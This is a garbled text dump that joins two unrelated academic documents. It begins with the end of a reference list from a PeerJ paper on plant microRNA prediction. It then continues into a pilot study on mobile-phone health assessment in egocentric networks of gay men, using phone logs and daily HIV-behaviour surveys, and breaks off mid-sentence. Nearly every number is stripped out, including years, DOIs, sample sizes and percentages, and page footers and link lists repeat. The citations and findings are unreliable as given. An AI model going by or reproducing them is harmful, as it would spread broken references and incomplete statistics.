drafts of the paper, approved the final draft. manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the raw data is available in the supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abe s. . overview of neural networks. in: neural networks and fuzzy systems. boston: springer us, – doi . / - - - - _ . abu-halaweh nm, harrison rw. . identifying essential features for the classifica- tion of real and pseudo micrornas precursors using fuzzy decision trees. in: ieee symposium on computational intelligence in bioinformatics and computational biology, cibcb . piscataway: ieee, – doi . /cibcb. . . ambros v, bartel b, bartel dp, burge cb, carrington jc, chen x, dreyfuss g, eddy sr, griffiths-jones s, marshall m, matzke m, ruvkun g, tuschl t. . a uniform system for microrna annotation. rna ( ): – doi . /rna. . an j, lai j, sajjanhar a, lehman ml, nelson cc. . mirplant: an integrated tool for identification of plant mirna from rna sequencing data. bmc bioinformatics : – doi . / - - - . axtell mj, meyers bc. . revisiting criteria for plant microrna annotation in the era of big data. the plant cell ( ): – doi . /tpc. . . axtell mj, westholm jo, lai ec. . vive la différence: biogenesis and evolution of micrornas in plants and animals. genome biology ( ): doi . /gb- - - - . breakfield nw, corcoran dl, petricka jj, shen j, sae-seaw j, rubio-somoza i, weigel d, ohler u, benfey pn. . high-resolution experimental and computational profiling of tissue-specific known and novel mirnas in arabidopsis. genome research ( ): – doi . /gr. . . breiman l. . random forests. machine learning ( ): – doi . /a: . challinor aj, watson j, lobell db, howden sm, smith dr, chhetri n. . a meta- analysis of crop yield under climate change and adaptation. nature climate change ( ): – doi . /nclimate . douglass s, hsu s-ww, cokus s, goldberg rb, harada jj, pellegrini m. . a naïve bayesian classifier for identifying plant micrornas. the plant journal: for cell and molecular biology ( ): – doi . /tpj. . evers m, huttner m, dueck a, meister g, engelmann jc. . mira: adaptable novel mirna identification in plants using small rna sequencing data. bmc bioinformatics ( ): – doi . /s - - - . manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /cibcb. . http://dx.doi.org/ . /rna. http://dx.doi.org/ . / - - - http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . /gb- - - - http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /a: http://dx.doi.org/ . /nclimate http://dx.doi.org/ . /tpj. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. fine s, singer y, tishby n. . the hierarchical hidden markov model: analysis and applications. machine learning ( ): – doi . /a: . freund y, schapire re. . a short introduction to boosting. technical report . gao p, bai x, yang l, lv d, li y, cai h, ji w, guo d, zhu y. . over-expression of osa-mir c decreases salt and alkali stress tolerance. planta ( ): – doi . /s - - - . guan d-gg, liao j-yy, qu z-hh, zhang y, qu l-hh. . mirexplorer: detecting micrornas from genome and next generation sequencing data using the adaboost method with transition probability matrix and combined features. rna biology ( ): – doi . /rna. . . . guan q, lu x, zeng h, zhang y, zhu j. . heat stress induction of mir triggers a regulatory loop that is critical for thermotolerance in arabidopsis. the plant journal ( ): – doi . /tpj. . hackenberg m, rodriguez-ezpeleta n, aransay am. . miranalyzer: an update on the detection and analysis of micrornas in high-throughput sequencing experi- ments. nucleic acids research (suppl):w –w doi . /nar/gkr . hoegh guldberg o, jacob d, taylor m, bindi m, brown s, camilloni i, diedhiou a, djalante r, ebi k, engelbrecht f, guiot k, hijioka y, mehrotra s, payne a, seneviratne s, thomas a, warren r, zhou g, halim s, achlatis m, alexander l, allen m, berry p, boyer c, brilli l, buckeridge m, cheung w, craig m, ellis n, evans j, fisher h, fraedrich k, fuss s, ganase a, gattuso j, greve p, guillen t, hanasaki n, hasegawa t, hayes k, hirsch a, jones c, jung t, kanninen m, krinner g, lawrence d, lenton t, ley d, liveman d, mahowald n, mcinnes k, meissner k, millar r, mintenbeck k, mitchell d, mix a, notz d, nurse l, okem a, olsson l, oppenheimer m, paz s, peterson j, petzold j, preuschmann s, rahman m, rogelj j, scheuffele h, schleussner c-f, scott d, seferian r, sillmann j, singh c, slade r, stephenson k, stephenson t, sylla m, tebboth m, tschakert p, vautard r, wartenburger r, wehner m, weyer n, whyte f, yohe g, zhang x, zougmore r. . chapter : impacts of . ◦c global warming on natural and human systems. global warming of . ◦c. an ipcc special report on the impacts of global warming of . ◦c above pre-industrial levels and related global greenhouse gas emission pathways, in the context of strengthening the global response to the threat of climate change. intergovernmental panel on climate change. available at http://pure.iiasa.ac.at/id/eprint/ / . hu y, lan w, miller d. . next-generation sequencing for microrna expression profile. new york: humana press, – doi . / - - - - _ . kadri s, hinman v, benos pv. . hhmmir: efficient de novo prediction of mi- crornas using hierarchical hidden markov models. bmc bioinformatics (suppl. ): – doi . / - - -s -s . kecman v. . support vector machines—an introduction. springer, berlin, heidelberg, – doi . / _ . manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /a: http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /rna. . . http://dx.doi.org/ . /tpj. http://dx.doi.org/ . /nar/gkr http://pure.iiasa.ac.at/id/eprint/ / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . / _ http://dx.doi.org/ . /peerj-cs. koh i, kim k-b. . mirhunter: a tool for predicting microrna precursors based on combined computational method. biochip journal ( ): – doi . /s - - - . kozomara a, birgaoanu m, griffiths-jones s. . mirbase: from microrna se- quences to function. nucleic acids research (d ):d –d doi . /nar/gky . kozomara a, griffiths-jones s. . mirbase: annotating high confidence micrornas using deep sequencing data. nucleic acids research (database issue): – doi . /nar/gkt . lecun y, bengio y, hinton g. . deep learning. nature ( ): – doi . /nature . li w-x, oono y, zhu j, he x-j, wu j-m, iida k, lu x-y, cui x, zhu j-k. . the arabidopsis nfya transcription factor is regulated transcriptionally and posttran- scriptionally to promote drought resistance. source: the plant cell ( ): – doi . /tpc. . . liberati a, altman dg, tetzlaff j, mulrow c, gøtzsche pc, ioannidis jpa, clarke m, devereaux pj, kleijnen j, moher d. . the prisma statement for re- porting systematic reviews and meta-analyses of studies that evaluate health care interventions: explanation and elaboration. plos medicine ( ):e doi . /journal.pmed. . liu b, asseng s, müller c, ewert f, elliott j, lobell d, martre p, ruane a, wallach d, jones j, rosenzweig c, aggarwal p, alderman p, anothai j, basso b, biernath c, cammarano d, challinor a, deryng d, sanctis g, doltra j, fereres e, folberth c, garcia-vila m, gayler s, hoogenboom g, hunt l, izaurralde r, jabloun m, jones c, kersebaum k, kimball b, koehler a-k, kumar s, nendel c, oleary g, olesen j, ottman m, palosuo t, prasad p, priesack e, pugh t, reynolds m, rezaei e, rötter r, schmid e, semenov m, shcherbak i, stehfest e, stöckle c, stratonovitch p, streck t, supit i, tao f, thorburn p, waha k, wall g, wang e, white j, wolf j, zhao z, zhu y. . similar estimates of temperature impacts on global wheat yield by three independent methods. nature climate change ( ): – doi . /nclimate . liu l, li y, li s, hu n, he y, pong r, lin d, lu l, law m. . comparison of next- generation sequencing systems. journal of biomedicine and biotechnology : – doi . / / . mall r, gupta a, sonkar g. . effect of climate change on agricultural crops. current developments in biotechnology and bioengineering epub ahead of print sep doi . /b - - - - . - . meng j, liu d, sun c, luan y. . prediction of plant pre-micrornas and their mi- crornas in genome-scale sequences using structure-sequence features and support vector machine. bmc bioinformatics ( ): doi . /s - - -x. meyers bc, axtell mj, bartel b, bartel dp, baulcombe d, bowman jl, cao x, carring- ton jc, chen x, green pj, griffiths-jones s, jacobsen se, mallory ac, martienssen ra, poethig rs, qi y, vaucheret h, voinnet o, watanabe y, weigel d, zhu j-k. manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nar/gky http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /nature http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . /journal.pmed. http://dx.doi.org/ . /nclimate http://dx.doi.org/ . / / http://dx.doi.org/ . /b - - - - . - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. . criteria for annotation of plant micrornas. plant cell ( ): – doi . /tpc. . . moran y, agron m, praher d, technau u. . the evolutionary origin of plant and animal micrornas. nature ecology & evolution ( ): doi . /s - - . ray dk, mueller nd, west pc, foley ja. . yield trends are insufficient to double global crop production by . plos one ( ):e doi . /journal.pone. . rogers k, chen x. . biogenesis, turnover, and mode of action of plant micrornas. the plant cell ( ): – doi . /tpc. . . runkler ta. . classification. in: data analytics. wiesbaden: vieweg+teubner verlag, – doi . / - - - - _ . silla pr, de o camargo-brunetto ma, binneck e. . using a support vector machine to identify pre-mirnas in soybean (glycine max) introns. in: th international conference on intelligent systems design and applications. piscataway: ieee, – . available at http://ieeexplore.ieee.org/document/ / doi . /isda. . . sunkar r, li y-f, jagadeeswaran g. . functions of micrornas in plant stress re- sponses. trends in plant science ( ): – doi . /j.tplants. . . . sunkar r, zhou x, zheng y, zhang w, zhu j-kk. . identification of novel and candidate mirnas in rice by high throughput sequencing. bmc plant biology ( ): – doi . / - - - . swain ph, hauska h. . the decision tree classifier: design and potential. ieee transactions on geoscience electronics ( ): – doi . /tge. . . taylor rs, tarver je, foroozani a, donoghue pcj. . microrna annota- tion of plant genomes—do it right or not at all. bioessays ( ): doi . /bies. . taylor rs, tarver je, hiscock sj, donoghue pcj. . evolutionary history of plant micrornas. trends in plant science : – doi . /j.tplants. . . . trindade i, capitão c, dalmay t, fevereiro mp, santos dmd. . mir and mir are up-regulated in response to water deficit in medicago truncatula. planta ( ): – doi . /s - - - . tseng k-c, chiang-hsieh y-f, pai h, chow c-n, lee s-c, zheng h-q, kuo p-l, li g-z, hung y-c, lin n-s, chang w-c. . microrpm: a microrna prediction model based only on plant small rna sequencing data. bioinformatics ( ): – doi . /bioinformatics/btx . unamba cin, nag a, sharma rk. . next generation sequencing technologies: the doorway to the unexplored genomics of non-model plants. frontiers in plant science : doi . /fpls. . . van peer g, lefever s, anckaert j, beckers a, rihani a, van goethem a, vold- ers p-j, zeka f, ongenaert m, mestdagh p, vandesompele j. . mirbase tracker: keeping track of microrna annotation changes. database : bau doi . /database/bau . manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . /s - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . / - - - - _ http://ieeexplore.ieee.org/document/ / http://dx.doi.org/ . /isda. . http://dx.doi.org/ . /j.tplants. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /tge. . http://dx.doi.org/ . /bies. http://dx.doi.org/ . /j.tplants. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bioinformatics/btx http://dx.doi.org/ . /fpls. . http://dx.doi.org/ . /database/bau http://dx.doi.org/ . /peerj-cs. vitsios dm, kentepozidou e, quintais l, benito-gutiérrez e, van dongen s, davis mp, enright aj. . mirnovo: genome-free prediction of micrornas from small rna sequencing data and single-cells using decision forests. nucleic acids research ( ):e doi . /nar/gkx . voinnet o. . origin, biogenesis, and activity of plant micrornas. cell ( ): – doi . /j.cell. . . . williams ph, eyles r, weiller g. . plant microrna prediction by supervised machine learning using c . decision trees. journal of nucleic acids : – doi . / / . wu j, pan s, zhu x, zhang c, wu x. . positive and unlabeled multi-graph learning. ieee transactions on cybernetics ( ): – doi . /tcyb. . . wu y, wei b, liu h, li t, rayner s. . mirpara: a svm-based software tool for prediction of most probable microrna coding regions in genome scale sequences. bmc bioinformatics ( ) doi . / - - - . xiao j, tang x, li y, fang z, ma d, he y, li m. . identification of microrna precursors based on random forest with network-level representation method of stem-loop structure. bmc bioinformatics ( ): doi . / - - - . xuan p, guo m, liu x, huang y, li w, huang y. . plantmirnapred: efficient clas- sification of real and pseudo plant pre-mirnas. bioinformatics ( ): – doi . /bioinformatics/btr . xue c, li f, he t, liu g-p, li y, zhang x. . classification of real and pseudo microrna precursors using local structure-sequence features and support vector machine. bmc bioinformatics ( ): doi . / - - - . yao y, ma c, deng h, liu q, zhang j, yi m. . plantmirp: an efficient com- putational program for the prediction of plant pre-mirna by incorporating knowledge-based energy features. molecular biosystems ( ): – doi . /c mb a. yousef m, allmer j, khalifa w. . sequence motif-based one-class classifiers can achieve comparable accuracy to two-class learners for plant microrna detection. journal of biomedical science and engineering ( ): – doi . /jbise. . . yousef m, allmer j, khalifa w, yousef m. . accurate plant microrna prediction can be achieved using sequence motif features. journal of intelligent learning systems and applications ( ): – doi . /jilsa. . . zhang x, zou z, gong p, zhang j, ziaf k, li h, xiao f, ye z. . over-expression of microrna confers enhanced drought tolerance to tomato. biotechnology letters ( ): – doi . /s - - - . zhang y, yun z, gong l, qu h, duan x, jiang y, zhu h. . comparison of mirna evolution and function in plants and animals. microrna ( ): – doi . / . zhao b, liang r, ge l, li w, xiao h, lin h, ruan k, jin y. . identification of drought-induced micrornas in rice. biochemical and biophysical research commu- nications ( ): – doi . /j.bbrc. . . . manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nar/gkx http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /tcyb. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . / - - - http://dx.doi.org/ . /c mb a http://dx.doi.org/ . /jbise. . http://dx.doi.org/ . /jilsa. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /j.bbrc. . . http://dx.doi.org/ . /peerj-cs. zhong y, xuan p, han k, zhang w, li j. . improved pre-mirna classification by reducing the effect of class imbalance. biomed research international : – doi . / / . zhou l, liu y, liu z, kong d, duan m, luo l. . genome-wide identification and analysis of drought-responsive micrornas in oryza sativa. source: journal of experimental botany ( ): – doi . /jxb/erq . zhu r, zhang z, li y, hu z, xin d, qi z, chen q. . discovering numerical differences between animal and plant micrornas. plos one ( ):e doi . /journal.pone. . zou q, mao y, hu l, wu y, ji z. . mirclassify: an advanced web server for mirna family classification and annotation. computers in biology and medicine ( ): – doi . /j.compbiomed. . . . manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / / http://dx.doi.org/ . /jxb/erq http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.compbiomed. . . http://dx.doi.org/ . /peerj-cs. ucla ucla previously published works title mobile phone assessment in egocentric networks: a pilot study on gay men and their peers. permalink https://escholarship.org/uc/item/ h k qv journal connections (toronto, ont.), ( - ) issn - author comulada, w scott publication date - - doi . / . . peer reviewed escholarship.org powered by the california digital library university of california https://escholarship.org/uc/item/ h k qv https://escholarship.org http://www.cdlib.org/ connections december | issue & | volume | insna.org mobile phone assessment in egocentric networks: a pilot study on gay men and their peers abstract mobile phone-based data collection encompasses the richness of social network research. both individual- level and network-level measures can be recorded. for example, health-related behaviors can be reported via mobile assessment. social interactions can be assessed by phone-log data. yet the potential of mobile phone data collection has largely been untapped. this is especially true of egocentric studies in public health settings where mobile phones can enhance both data collection and intervention delivery, e.g. mobile users can video chat with counselors. this is due in part to privacy issues and other barriers that are more difficult to address outside of academic settings where most mobile research to date has taken place. in this article, we aim to inform a broader discussion on mobile research. in particular, benefits and challenges to mobile phone-based data collection are highlighted through our mobile phone-based pilot study that was conducted on egocentric networks of gay men (n = total participants). hiv-transmission and general health behaviors were reported through a mobile phone-based daily assessment that was administered through study participants’ own mobile phones. phone log information was collected from gay men with android phones. benefits and challenges to mobile implementation are discussed, along with the application of multi-level models to the type of longitudinal egocentric data that we collected. keywords: gay men, hiv risk behaviors, mobile phone log, ecological momentary assessment, ohmage authors w. scott comulada, is an assistant professor-in-residence in the department of psychiatry and biobehavioral sciences at the university of california, los angeles, california. he is also a methods core scientist for the center for hiv identification, prevention, and treatment services (chipts; p mh ) acknowledgements this study was funded and supported by the national institute of mental health (k mh ; p mh ). mobile phone-based data collection was supported by ohmage and the following centers at the university of california, los angeles: the center for embedded networked sensing and mobilize labs. in particular, i would like to thank deborah estrin and nithya ramanathan for input on the development of the mobile assessment. please send all correspendence to w. scott comulada, ucla center for community health, wilshire blvd, suite , los angeles, ca , usa. wcomulada@mednet.ucla.edu. w. scott comulada university of california los angeles, california connections insna.org | volume | issue | december mobile phone assessment in egocentric networks . introduction mobile phones are by nature social devices as highlighted by numerous studies on the structure of mobile communication networks (e.g., onnela et al., ; ye et al., ) and individual tie strengths (zhang & dantu, ). most studies have analyzed sociometric data where large and bounded networks are observed. in contrast, egocentric networks of individuals, i.e. egos, and their peers, i.e. alters, have received less attention. in part, the focus on sociometric data may be due to the availability of “safe” data sets that are collected in laboratory settings, often on faculty and students where privacy issues are less critical and participants are technologically savvy. a good example is the mit reality mining data set (zhang & dantu, ). egocentric networks are often assessed in public health settings on marginalized populations, e.g. drug-using networks (yang, latkin, muth, & rudolph, ). privacy is critical and “tech-savvy” assumptions may be unrealistic. yet mobile assessment has been successfully carried out in cocaine-addicted homeless patients (freedman et al., ) and other marginalized populations. furthermore, mobile technologies can enhance data collection and intervention delivery in public health settings, e.g. ecological momentary interventions (heron & smyth, ). as we have found in our own transition from more traditional modes of data collection to mobile-based studies, an important part of the implementation process is a clear understanding of what mobile technologies can and cannot do. as noted by lazer et al. ( ), researchers and institutional review boards (irbs) alike need to be up to speed on the latest technologies in order to design and evaluate proper privacy and encryption protocols, respectively. in this article, we highlight the benefits and limitations of mobile data collection through egocentric data that was collected to test the implementation of a mobile phone-based health assessment in a sample of gay men, i.e. egos, and their peers, i.e. alters. both egos and alters used their own phones to fill out a health assessment and enter sensitive information on hiv-transmission behaviors. we collected phone-log data from a subset of the egos with android phones in order to compare mobile communications with alters in the study and with individuals who did not enroll in the study. therefore, our study provides a good opportunity to discuss privacy and ethical issues that are central to public health settings. we also give examples of research questions and analytic strategies that are afforded by the collection of mobile data in an egocentric study. a key feature of our data is the three levels of hierarchy. egocentric data normally contains two levels where individuals (both egos and alters) are nested within egocentric networks. multi- level models are applied and contain random effects for each network to allow mean levels of the outcome to differ across networks (e.g., hall, ; rice et al., ; snijders, spreen, & zwaagstra, ; valente, ). in our study, participants filled out an end-of-the-day mobile assessment over a month; repeated observations are nested within individuals. we discuss extensions to the basic multi-level model to analyze longitudinal egocentric data. it is important to note that longitudinal data in our study resulted from daily reporting which is a course version of ecological momentary assessment (ema) where events are recorded as they occur in situ. ema also involves a large number of repeated measurements and depends on careful timing, e.g. several times a day, to capture variations in behavior within days (see shiffman, stone, & hufford, , and stone and shiffman, , for overviews). in contrast, standard assessment methods rely on retrospective recall where study participants are asked to report on behaviors over a period of time and are often interviewed in a clinical setting. ema minimizes recall biases that are intensified as individuals reconstruct and retrieve events from their memory over longer periods of time. by self-administering assessments, ema may also reduce interview bias, e.g. in giving socially desirable responses to sexual behavior questions (kissinger et al., ). . data and methods . participants recruitment was conducted online (figure ). from april to august, , egos were recruited through pop- up messages on grindr, a dating website for gay men, and postings on craigslist that directed them to a study webpage. craigslist is an online forum for classified ads. the study webpage directed egos to online screening and consent forms that were hosted by surveymonkey (http://www.surveymonkey.com/). study eligibility required egos to ) self-identify as a gay or bisexual man; ) be at least years old; ) live in los angeles county; ) use a web-enabled android phone, version . or higher (issued after november ), or an iphone; ) use their mobile phone to participate in the study; and ) recruit at least alters who had an android or iphone they could use to participate in the study. out of egos who started the online forms, % were not eligible (n = ) and % did not finish filling out the forms (n = ). it is hard to know why connections december | issue | volume | insna.org mobile phone assessment in egocentric networks so many individuals did not finish filling out forms. in at least one instance, a peer started to fill out the forms on their mobile phone, lost internet connection, and did not attempt to re-initiate the forms. eligible egos ( %; n = of ) were e-mailed to set up a one-time telephone interview and also received instructions on how to install and use the study mobile apps; calls were scheduled with egos. during the call, we administered a demographic and social network assessment. grindr banner ads were the primary recruitment source (n = of telephone interviews). after the telephone interview, egos were sent an e-mail template they could send to alters they wished to invite into the study. the e-mail template contained a link that directed interested alters to a separate study webpage and in turn, online screener and consent forms. the online form asked alters to enter the first name and phone number of the ego who recruited them so we could construct ego-alter links. eligible alters fulfilling ), ), and ) were contacted and administered a demographic assessment. we relaxed the requirement for egos to recruit alters and allowed egos and alters to participate if at least alters per egocentric network were recruited. out of egos who completed a telephone interview, roughly in recruited at least alters and enrolled in the study (n = of ; figure ). we did not follow-up with unenrolled egos to find out the reason. one ego let us know that his friends did not want to join and “share private information”. out of alters who started the online screener, % (n= ) completed the screener and provided contact information to schedule an interview. thirty two of alters who were interviewed by telephone enrolled in the study. egos and alters were e-mailed amazon gift card activation codes worth $ and $ , respectively, at the end of the study as incentives. egos and alters who were the most compliant in filling out the daily health assessment were entered into a drawing to also receive an amazon gift card activation code worth $ . all study procedures were approved by the institutional review board at the university of california, los angeles. . data collection telephone interviews were conducted at the beginning of the study prior to the start of the mobile phone health assessment. egos were queried on where they heard about the study, the model of the mobile phone they would be using during the study, age, and ethnicity. alters were queried on their relationship to the ego who recruited them, gender, age, ethnicity, whether or not they lived in los angeles county, and their sexual orientation. during figure : recruitment and enrollment of egos (gay men) and alters and initiation of mobile phone-based data collection. connections insna.org | volume | issue | december mobile phone assessment in egocentric networks the telephone interview, egos were also administered a -item adapted version of the arizona social support inventory (barrera & gottlieb, ) to elicit names of people with whom the respondent socializes, lives, eats meals, has sex, does alcohol and drugs, receives health advice, calls upon for material and emotional support, or any other people who were important to them that had not been prompted by the prior name-generator questions. after the -item inventory, we asked for names of alters the ego was planning to ask to join them in the study. almost all of the egos who enrolled in the study recruited at least one alter who had not been prompted by the -item inventory (n = of ). we calculated the size of each egocentric network based on the number of names generated by the -item inventory. seven of the egos gave “other” responses that encompassed multiple people, e.g. “family”, and were excluded from the network-size calculation. phone logs were recorded through systemsens (http://systemsens.ohmage.org), an android application that was designed to collect passive system data and developed through the ucla center for embedded networked sensing. egos with android phones were asked to download systemsens to their mobile phone through an e-mail link. once installed, systemsens automatically encrypted and uploaded phone-log data (including phone numbers, the duration, and date / time stamp of incoming and outgoing calls and text messages) to servers at ucla whenever the user charged their phone. to protect the identity of phone numbers belonging to individuals who were not enrolled in the study, all phone numbers in the phone log were scrambled using sha- , a cryptographic hash function published by the national institute of standards and technology. there are several notable features of sha- . hashed numbers appear as unique -bit values, e.g. “b a bdd af d d d eb b a”. as a result, one is able to identify if two hashed numbers are of the same phone number. however, it is nearly impossible to recover the original phone number from a hashed number alone. the original phone number is necessary to act as a key that unscrambles the hashed number and verifies the original number. mobile phone assessment. all participants (both egos and alters) were asked to fill out the same daily assessment on their mobile phone for a month. assessments were launched using the ohmage application (http://www.ohmage.org), an open-source application that is compatible with android and iphones. ohmage allows for assessments to be rapidly authored using the extensible markup language (xml), and allows data to flow from participants’ mobile phones to a centralized database. in this study, ohmage was launched with an html application implemented using the mobile web framework (mwf). the application runs on both android and iphones and is available for download from the google play and apple app stores, respectively. a version of ohmage that is native to android phones has been implemented in prior studies (swendeman et al., ); feedback from focus groups on prior mobile studies informed the design of the mobile assessment (ramanathan et al., ). once installed, participants accessed the mobile asssessment through the ohmage dashboard shown in figure a. at the end of each assessment, responses were encrypted, uploaded to servers at ucla, and removed from the user’s mobile phone, as long as there was network connectivity and the phone battery was not low. responses could also be manually uploaded at a later time. mobile phone assessment consisted of questions that participants were asked to fill out at the end of the day for a month. questions encompassed the table : frequency of communication with alters based on ego reports (includes face-to-face, telephone, and social media contact) and based on the number of days between phone log calls/ text messages between egos and alters connections december | issue | volume | insna.org mobile phone assessment in egocentric networks following domains in the following order: (a) an adapted version of the healthy days symptoms module from the health-related quality of life instrument (hrqol; centers for disease control and prevention, ), including questions on mood, worry, sleep, energy level, and impairment; (b) daily minutes of exercise and type of exercise, e.g. “jogging”; (c) rating of one’s daily eating, e.g. “less healthy than usual”; (d) a food inventory that was constructed from multiple food inventories (e.g., fulkerson et al., ; kaiser et al., ; sisk, sharkey, mcintosh, & anding, ) and designed to fit across two cell phone screens; (e) sexual behavior, including the number of sexual encounters involving anal or vaginal sex, the number of encounters with “casual (including one-time and first-time) partners”, and condom usage; and (g) alcohol and substance use. all questions included a “refuse to answer” response option so that participants were not forced to answer any questions they did not want to. however, we did not want participants to repetitively select refusal responses in order to get through the daily assessment more quickly. we placed additional “speed bump” questions that required participants to specify why they refused to answer the prior question in two places. the first speed- bump question was placed after minutes of exercise were queried, and the second was placed after the number of sexual encounters was queried at approximately the halfway point and end of the assessment. no refusals were entered, except for the impairment question ( refusal) and substance use ( refusals). . analytic strategies and results . . sample characteristics among egos who were interviewed over the telephone (n = ), the average age was . years old (range = to ). ethnicity was reported as african american ( . %), latino ( . %), white ( . %), or other ( . %). egos reported a network size of . members, on average (range = to ). networks were fairly homogenous with respect to age and ethnicity. for example, most of the white egos (n = of ) only recruited white alters. half of the latino egos (n = of ) only recruited latino alters. . . call logs phone logs were recorded for four egos with android phones. logs began recording as soon as systemsens was installed and continued until the end of the study that included the -day health assessment time period (range = to days). one ego was only able to recruit one peer and dropped out of the study after days. similar to onnela et al. ( ), we excluded one-way communications where calls or text from an ego to a phone number occurred, or vice versa, but were not reciprocated. by focusing on reciprocated communications, we eliminated communications related to single events where egos did not personally know individuals they were communicating with. two phone log analyses are discussed. agreement between self-reported contact and phone logs. the frequency of contact with network members is typically self-reported by egos. given the additional contact information provided by mobile communication (both calls and text messages), a natural question arises. do phone logs provide overlapping information to self-reported contact or do phone logs provide additional information? table demonstrates a way to address this question by showing egos’ self- reported frequency of contact with alters that was reported during the telephone interview and the median number of days between mobile communications with alters. phone logs corroborate the self-reported frequencies fairly well. for example, four of five “daily” reports matched up with call logs where half of the communications occurred within a day of each other. alter closeness. there is a general understanding in social network research that observed networks in a study are incomplete. social ties with individuals outside figure : ohmage mwf screenshots showing (a) dashboard for accessing daily health survey and sample questions from the daily health survey, including a (b) multiple-response item and (c) an item requiring numeric entry. connections insna.org | volume | issue | december mobile phone assessment in egocentric networks the study network can sometimes be constructed by self-report (e.g., fowler & christakis, ), though this is typically not the case. therefore, phone log communication data can fill in gaps on self-reported network compositions. in particular, we focus on the frequency of egos’ mobile communications with recruited alters and individuals outside the study as a proxy for ego-alter closeness. information on closeness with alters who are likely to be recruited into a study has the potential to inform the design of both social network- based interventions (see valente, for a review) and recruitment strategies (e.g., respondent-driven sampling; heckathorn, , ). figure shows the percentage of communications with each alter and with the remaining telephone numbers in the phone logs. among these four egos, we note that they recruited at least one alter they were in fairly frequent contact with, e.g. partners for egos and ( . % and . % of the total communications, respectively). . . mobile health assessment we discuss two types of multi-level regression models that address research questions specific to each level of hierarchy in a longitudinal egocentric data set. network-level questions. holistic health approaches often track multiple and disparate measures of health. for example, le roux et al. ( ) examined mental health, general health, and hiv-transmission behaviors. in this vein, we examined how multiple health behaviors and hrqol cluster within networks. due to the small sample size, an ad hoc approach was used. responses for each individual were aggregated over their -day study period. we then fit separate multi-level models to each hrqol or behavioral measure. pearson product-moment correlations were then examined within the pairs of network-level random effects between all possible pairs of hrqol and behavioral outcomes. correlations were in expected directions. for example, at the network level, there were negative correlations between numbers of alcoholic beverages and both mean levels of healthy feelings (r = -. ) and days of exercise (r = -. ). a more formal modeling approach uses a bivariate-outcome multi-level model similar to comulada et al. ( , ). here we consider longitudinal egocentric data with two continuous outcome measures, e.g. levels of mood and sleep. for individual i in network n at time point t and outcome k (= , ), a bivariate random-intercept linear model on continuous outcome ynitk is expressed as ynitk = xnitk´βk + λnk + ηnik + εnitk, ( ) where βk is a vector of regression coefficients for covariate vector xnitk on outcome k. correlations for each outcome within networks and across repeated observations within individuals are accounted for by random effects λnk and ηnik, respectively. residual error term εnitk accounts for variance that is unexplained by the random effects. a key feature of the model is that correlations between outcomes are modeled through a variance-covariance matrix that is shared by random effects and residual terms figure : percentage of (n) reciprocated calls or text messages: connections december | issue | volume | insna.org mobile phone assessment in egocentric networks across outcomes. in particular, cross-correlations can be examined between outcomes at different time points, e.g. the relationship between drug use and trust between egos and alters over several time points (comulada et al., ). individual-level questions. longitudinal studies typically entail a few time points. analyses focus on mean changes over time, e.g. decreases in drug use. ema in our study resulted in numerous time points (intensive longitudinal data; walls & shafer, ). in larger samples, changes in variability, as well as mean levels, can be examined using location scale models (hedeker, mermelstein, & demirtas, ; hedeker, demirtas, & mermelstein, ). for example, hedeker, demirtas, & mermelstein ( ) examined mood fluctuations in smokers over time. . discussion our mobile phone-based pilot study on egocentric networks of gay men and their peers highlights a number of benefits that are scalable to larger studies and other populations. first, recruitment and implementation of the study was carried out without in-person visits with study participants. second, participants used their own mobile phones, which alleviated the need to carry another electronic data-entry device. both features served to reduce participant burden and study costs that are associated with traditional studies, e.g. interviewers were not needed. a degree of anonymity was also provided for participants, which may be an important issue for marginalized populations. past ema studies have typically relied on paper diaries that are prone to backfilling (stone et al., , ). palm top computers address this issue, but still introduce a degree of user burden that can be attenuated by making use of an individual’s own mobile phone. an important feature of our study, in terms of data quality, was the ability to visualize uploaded mobile assessment data through a website portal in near real time. research staff checked the data every few days. in one instance, no data was observed for an alter after initial study enrollment. telephone contact with the study participant revealed that they were accidentally preventing their assessment data from being uploaded to the study team. the problem was easily corrected, and only a few days of data were lost. the strength of our technologically-driven study design is also an obvious limitation for implementation in other populations. in studying egocentric networks of gay men who use grindr and live in los angeles, we focused on a fairly tech-savvy population. furthermore, gay men in los angeles are often targeted for hiv-related studies, especially through grindr (e.g., rendina et al., ). at enrollment, a number of our study participants were already familiar with standard study protocols. these characteristics facilitated the use of online recruitment and mobile assessment. using these tools would be more difficult in other populations where study details are better explained in person and where study participants may be more reluctant to enter 